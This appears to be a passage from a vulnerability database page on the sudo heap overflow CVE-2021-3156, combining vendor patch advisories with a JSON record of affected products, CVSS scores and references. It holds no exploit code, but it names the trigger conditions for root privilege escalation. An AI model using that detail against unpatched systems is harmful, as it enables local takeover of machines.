It was discovered that Sudo incorrectly handled memory when parsing command lines. A local attacker could possibly use this issue to obtain unintended access to the administrator account. (CVE-2021-3156)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: sudo 1.8.9p5-1ubuntu1.5+esm6

Ubuntu 12.04 ESM: sudo 1.8.3p1-1ubuntu3.10

In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: sudo security update Advisory ID: RHSA-2021:0224-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:0224 Issue date: 2021-01-26 CVE Names: CVE-2021-3156 ==================================================================== 1. Summary:

An update for sudo is now available for Red Hat Enterprise Linux 7.4 Advanced Update Support, Red Hat Enterprise Linux 7.4 Telco Extended Update Support, and Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions.

Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server E4S (v. 7.4) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.4) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.4) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.4) - x86_64

Description:

The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Security Fix(es):

sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing

Package List:

Red Hat Enterprise Linux Server AUS (v. 7.4):

Source: sudo-1.8.19p2-12.el7_4.2.src.rpm

x86_64: sudo-1.8.19p2-12.el7_4.2.x86_64.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.4):

Source: sudo-1.8.19p2-12.el7_4.2.src.rpm

ppc64le: sudo-1.8.19p2-12.el7_4.2.ppc64le.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.ppc64le.rpm

x86_64: sudo-1.8.19p2-12.el7_4.2.x86_64.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.4):

Source: sudo-1.8.19p2-12.el7_4.2.src.rpm

x86_64: sudo-1.8.19p2-12.el7_4.2.x86_64.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.4):

x86_64: sudo-debuginfo-1.8.19p2-12.el7_4.2.i686.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm sudo-devel-1.8.19p2-12.el7_4.2.i686.rpm sudo-devel-1.8.19p2-12.el7_4.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.4):

ppc64le: sudo-debuginfo-1.8.19p2-12.el7_4.2.ppc64le.rpm sudo-devel-1.8.19p2-12.el7_4.2.ppc64le.rpm

x86_64: sudo-debuginfo-1.8.19p2-12.el7_4.2.i686.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm sudo-devel-1.8.19p2-12.el7_4.2.i686.rpm sudo-devel-1.8.19p2-12.el7_4.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.4):

x86_64: sudo-debuginfo-1.8.19p2-12.el7_4.2.i686.rpm sudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm sudo-devel-1.8.19p2-12.el7_4.2.i686.rpm sudo-devel-1.8.19p2-12.el7_4.2.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2021-3156 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/RHSB-2021-002

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYBB1htzjgjWX9erEAQjwNQ/9HBoqYFsK25G0+2QKqO2FTwr0G7P5gx3n 93VL0desDcpNXLdd4lwWcx1gAQkKSiYtMyFl5JdrqTznudDPo/V4dPBbPl3hkIr8 zGiiKTDErT2MeCm5T4RXJVFzCCJA78io7MENH0Wr0SVTybjljKs1m06egY120kC0 ax3v92dap0K6KNAlVLscRzc2p0veauF+cfpk+5+Zomzw89QRTrWYt7BBxUxFsk2u sS0t9cmT3UURXjsqdDjMmilxWbqmKzKePhWeCfu8zBNc+TacLSXBqZmPgSlB1V5U WTzSNIu3AGSpcniqcx0It4ncfmwGfmmekQ0U4ZTBLkM+fr7krikFiBFsf+jPaqvn PNFdJY318EAJWxzRGhf9UunlMVYrimjjNxqMU1LVIxIhRzQEi0BhlMIcFjIZp0UN Pa1nqJ0YKZbZ/+vvqzd6c6lALjsYBSOhkEpmr0ZivaXl1wIPB4cZ4yrKjMlO0DsP qsG4YmwIq+pl85wH4dPA2TG7mMF4CdWYvykUQlVfYSlGAXAllGaeNDAnySfi/FWE zXTdkjxc9uHojrhfUtX5pDoflFWoerbbaLK//fCTFuULhKfAhe5QidiCiU+LpFb2 aM23SHk+HZm8LnC2KM0fe0VzSk9fHWgOYXHx0iOYsqwRzHwe+d+AJ4bZkKxf2/pT /eC3svyPRxA=fsAW -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "sudo",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "sudo",
        "version": "1.9.0"
      },
      {
        "_id": null,
        "model": "communications performance intelligence center",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "10.3.0.2.1"
      },
      {
        "_id": null,
        "model": "ontap select deploy administration utility",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "micros es400",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "400"
      },
      {
        "_id": null,
        "model": "communications performance intelligence center",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "10.4.0.3.1"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "10.0.4"
      },
      {
        "_id": null,
        "model": "privilege management for mac",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "beyondtrust",
        "version": "21.1.1"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "9.2.8"
      },
      {
        "_id": null,
        "model": "micros es400",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "410"
      },
      {
        "_id": null,
        "model": "skynas",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": "communications performance intelligence center",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "10.3.0.0.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "_id": null,
        "model": "diskstation manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.2"
      },
      {
        "_id": null,
        "model": "sudo",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "sudo",
        "version": "1.8.32"
      },
      {
        "_id": null,
        "model": "micros kitchen display system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "210"
      },
      {
        "_id": null,
        "model": "privilege management for unix\\/linux",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "beyondtrust",
        "version": "10.3.2-10"
      },
      {
        "_id": null,
        "model": "sudo",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "sudo",
        "version": "1.9.5"
      },
      {
        "_id": null,
        "model": "tekelec platform distribution",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.4.0"
      },
      {
        "_id": null,
        "model": "diskstation manager unified controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "micros compact workstation 3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "310"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "8.2.17"
      },
      {
        "_id": null,
        "model": "micros workstation 6",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "610"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "sudo",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "sudo",
        "version": "1.8.2"
      },
      {
        "_id": null,
        "model": "oncommand unified manager core package",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "vs960hd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "tekelec platform distribution",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.7.1"
      },
      {
        "_id": null,
        "model": "sudo",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sudo",
        "version": "1.9.5"
      },
      {
        "_id": null,
        "model": "ontap tools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "9"
      },
      {
        "_id": null,
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "micros workstation 6",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "655"
      },
      {
        "_id": null,
        "model": "communications performance intelligence center",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "10.4.0.1.0"
      },
      {
        "_id": null,
        "model": "micros workstation 5a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5a"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "This document was written by Timur Snoke.Statement Date:\u00a0\u00a0 February 15, 2021",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#794544"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-3156",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-3156",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.0,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-383931",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2021-3156",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-3156",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2021-3156",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-383931",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character. A heap-based overflow has been discovered in the set_cmd() function in sudo, which may allow a local attacker to execute commands with elevated administrator privileges.CVE-2021-3156 AffectedCVE-2021-3156 Affected. Any local user (sudoers and non-sudoers)\ncan exploit this flaw for root privilege escalation. \n\nFor the stable distribution (buster), this problem has been fixed in\nversion 1.8.27-1+deb10u3. \n\nWe recommend that you upgrade your sudo packages. \n\nFor the detailed security status of sudo please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/sudo\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAQWctfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Qr2w/5AfAZMSbKestTzvm22w+T5yReGOd2jYXO2SzdqdkIzOVXJ83RrbogkiyK\nd1ie47Csw51M8L5eT/kf48vkABPqT9S0dlRI7rQ2xbIDWIUcDpnFNCSclSGjI+Sd\nHqtaQQbR+MdSjGtC8vc8RVEOEQcVvoXrqDPaEniWjA4uTV7Iqj0P3EpH1XolVlZv\nlw4ZZ+VdDolxhm1QWp/NiMKUlDpv5RLs6jW0oQAKP1RZqMIX44TSEHil/NEs6VeN\nu5AFUwo5iwYRCUbgi2mB0GxV4CRyb0IN26pGsltYJsReFL1vCMiO9drGMk/WhlqB\nNGKeF5rLsMKaJCkBEcMntDG1XtFhXuyak2O4atL7H8CwhBZ81Axe+aAynn7IB99B\nqx3GLfRNSVKHQHBHWEOxqILCS+xWmvL6/uB6xMaAh5CXxhEgs9BIEiPonccmkzQ9\nxj6Uw/aWv9ZOUu+Rwmp+bG/V8DKaFKegaQAy0HnhOZ11ruJJB/YicTXSsbxoLSEt\nhbd0bYAOrZBqcysH8Ed+R2tGxtjoWIDLcv3uUqmttxgd8E5YpGGngaYBleGCnB0s\nX3JDyd1pvBu7H0vR5k2bVNgm4qQ27jHmeNKRSpvUZv50mRX8NQyv/rrROwkUsVdI\n1EnlHYz0E4BUfb15ECWLfN9BM/MyPhkdKadIrrd+zJEwq+KVcHo=\n=d9gQ\n-----END PGP SIGNATURE-----\n. Relevant releases/architectures:\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64\nRed Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64\nRed Hat Virtualization 4 Management Agent for RHEL 7 Hosts - noarch\n\n3. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nBug Fix(es):\n\n* Previously, the Red Hat Virtualization Host (RHV-H) repository\n(rhvh-4-for-rhel-8-x86_64-rpms) did not include the libsmbclient package,\nwhich is a dependency for the sssd-ad package. Consequently, the sssd-ad\npackage failed to install. \n\nWith this update, the libsmbclient is now in the RHV-H repository, and\nsssd-ad now installs on RHV-H. (BZ#1868967)\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1850939 - Hosted engine deployment does not properly show iSCSI LUN errors\n1868967 - sssd-ad installation fails on RHV-H 4.4 due to missing libsmbclient from samba package in rhvh-4-for-rhel-8-x86_64-rpms channel\n1889686 - CVE-2020-25684 dnsmasq: loose address/port check in reply_query() makes forging replies easier for an off-path attacker\n1889688 - CVE-2020-25685 dnsmasq: loose query name check in reply_query() makes forging replies easier for an off-path attacker\n1890125 - CVE-2020-25686 dnsmasq: multiple queries forwarded for the same name makes forging replies easier for an off-path attacker\n1902315 - Rebase RHV-H 4.4 to RHV 4.4.4\n1902646 - ssh connection fails due to overly permissive openssh.config file permissions\n1909644 - HE deploy failed with \"Failed to download metadata for repo \u0027rhel-8-for-x86_64-baseos-beta-rpms\u0027: Cannot download repomd.xml\n1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing\n1921553 - RHVH upgrade to the latest 4.4.4-1 build will fail due to FileNotFoundError\n1923126 - Hosted Engine setup fails on storage selection - Retrieval of iSCSI targets failed. 8.1) - aarch64, ppc64le, s390x, x86_64\n\n3. 6 ELS) - i386, s390x, x86_64\n\n3. ==========================================================================\nUbuntu Security Notice USN-4705-2\nJanuary 27, 2021\n\nsudo vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in Sudo. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n It was discovered that Sudo incorrectly handled memory when parsing command\n lines. A local attacker could possibly use this issue to obtain unintended\n access to the administrator account. (CVE-2021-3156)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  sudo                            1.8.9p5-1ubuntu1.5+esm6\n\nUbuntu 12.04 ESM:\n  sudo                            1.8.3p1-1ubuntu3.10\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: sudo security update\nAdvisory ID:       RHSA-2021:0224-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:0224\nIssue date:        2021-01-26\nCVE Names:         CVE-2021-3156\n====================================================================\n1. Summary:\n\nAn update for sudo is now available for Red Hat Enterprise Linux 7.4\nAdvanced Update Support, Red Hat Enterprise Linux 7.4 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.4 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.4) - x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.4) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.4) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.4) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.4) - x86_64\n\n3. Description:\n\nThe sudo packages contain the sudo utility which allows system\nadministrators to provide certain users with the permission to execute\nprivileged commands, which are used for system management purposes, without\nhaving to log in as root. \n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1917684 - CVE-2021-3156 sudo: Heap buffer overflow in argument parsing\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.4):\n\nSource:\nsudo-1.8.19p2-12.el7_4.2.src.rpm\n\nx86_64:\nsudo-1.8.19p2-12.el7_4.2.x86_64.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.4):\n\nSource:\nsudo-1.8.19p2-12.el7_4.2.src.rpm\n\nppc64le:\nsudo-1.8.19p2-12.el7_4.2.ppc64le.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.ppc64le.rpm\n\nx86_64:\nsudo-1.8.19p2-12.el7_4.2.x86_64.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.4):\n\nSource:\nsudo-1.8.19p2-12.el7_4.2.src.rpm\n\nx86_64:\nsudo-1.8.19p2-12.el7_4.2.x86_64.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.4):\n\nx86_64:\nsudo-debuginfo-1.8.19p2-12.el7_4.2.i686.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.i686.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.4):\n\nppc64le:\nsudo-debuginfo-1.8.19p2-12.el7_4.2.ppc64le.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.ppc64le.rpm\n\nx86_64:\nsudo-debuginfo-1.8.19p2-12.el7_4.2.i686.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.i686.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.4):\n\nx86_64:\nsudo-debuginfo-1.8.19p2-12.el7_4.2.i686.rpm\nsudo-debuginfo-1.8.19p2-12.el7_4.2.x86_64.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.i686.rpm\nsudo-devel-1.8.19p2-12.el7_4.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-3156\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/RHSB-2021-002\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYBB1htzjgjWX9erEAQjwNQ/9HBoqYFsK25G0+2QKqO2FTwr0G7P5gx3n\n93VL0desDcpNXLdd4lwWcx1gAQkKSiYtMyFl5JdrqTznudDPo/V4dPBbPl3hkIr8\nzGiiKTDErT2MeCm5T4RXJVFzCCJA78io7MENH0Wr0SVTybjljKs1m06egY120kC0\nax3v92dap0K6KNAlVLscRzc2p0veauF+cfpk+5+Zomzw89QRTrWYt7BBxUxFsk2u\nsS0t9cmT3UURXjsqdDjMmilxWbqmKzKePhWeCfu8zBNc+TacLSXBqZmPgSlB1V5U\nWTzSNIu3AGSpcniqcx0It4ncfmwGfmmekQ0U4ZTBLkM+fr7krikFiBFsf+jPaqvn\nPNFdJY318EAJWxzRGhf9UunlMVYrimjjNxqMU1LVIxIhRzQEi0BhlMIcFjIZp0UN\nPa1nqJ0YKZbZ/+vvqzd6c6lALjsYBSOhkEpmr0ZivaXl1wIPB4cZ4yrKjMlO0DsP\nqsG4YmwIq+pl85wH4dPA2TG7mMF4CdWYvykUQlVfYSlGAXAllGaeNDAnySfi/FWE\nzXTdkjxc9uHojrhfUtX5pDoflFWoerbbaLK//fCTFuULhKfAhe5QidiCiU+LpFb2\naM23SHk+HZm8LnC2KM0fe0VzSk9fHWgOYXHx0iOYsqwRzHwe+d+AJ4bZkKxf2/pT\n/eC3svyPRxA=fsAW\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3156"
      },
      {
        "db": "CERT/CC",
        "id": "VU#794544"
      },
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      },
      {
        "db": "PACKETSTORM",
        "id": "168983"
      },
      {
        "db": "PACKETSTORM",
        "id": "161281"
      },
      {
        "db": "PACKETSTORM",
        "id": "161139"
      },
      {
        "db": "PACKETSTORM",
        "id": "161137"
      },
      {
        "db": "PACKETSTORM",
        "id": "161141"
      },
      {
        "db": "PACKETSTORM",
        "id": "161163"
      },
      {
        "db": "PACKETSTORM",
        "id": "161142"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-383931",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-3156",
        "trust": 2.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#794544",
        "trust": 1.9
      },
      {
        "db": "PACKETSTORM",
        "id": "161230",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161160",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161270",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161293",
        "trust": 1.1
      },
      {
        "db": "MCAFEE",
        "id": "SB10348",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/01/27/2",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/01/26/3",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/02/15/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/01/27/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/14/2",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2024/01/30/6",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2024/01/30/8",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "176932",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "161163",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161141",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161142",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161139",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161281",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161137",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "161143",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161152",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161138",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161144",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161140",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161272",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161398",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161136",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161135",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161145",
        "trust": 0.1
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-99117",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-383931",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168983",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#794544"
      },
      {
        "db": "VULHUB",
        "id": "VHN-383931"
      },
      {
        "db": "PACKETSTORM",
        "id": "168983"
      },
      {
        "db": "PACKETSTORM",
        "id": "161281"
      },
      {
        "db": "PACKETSTORM",
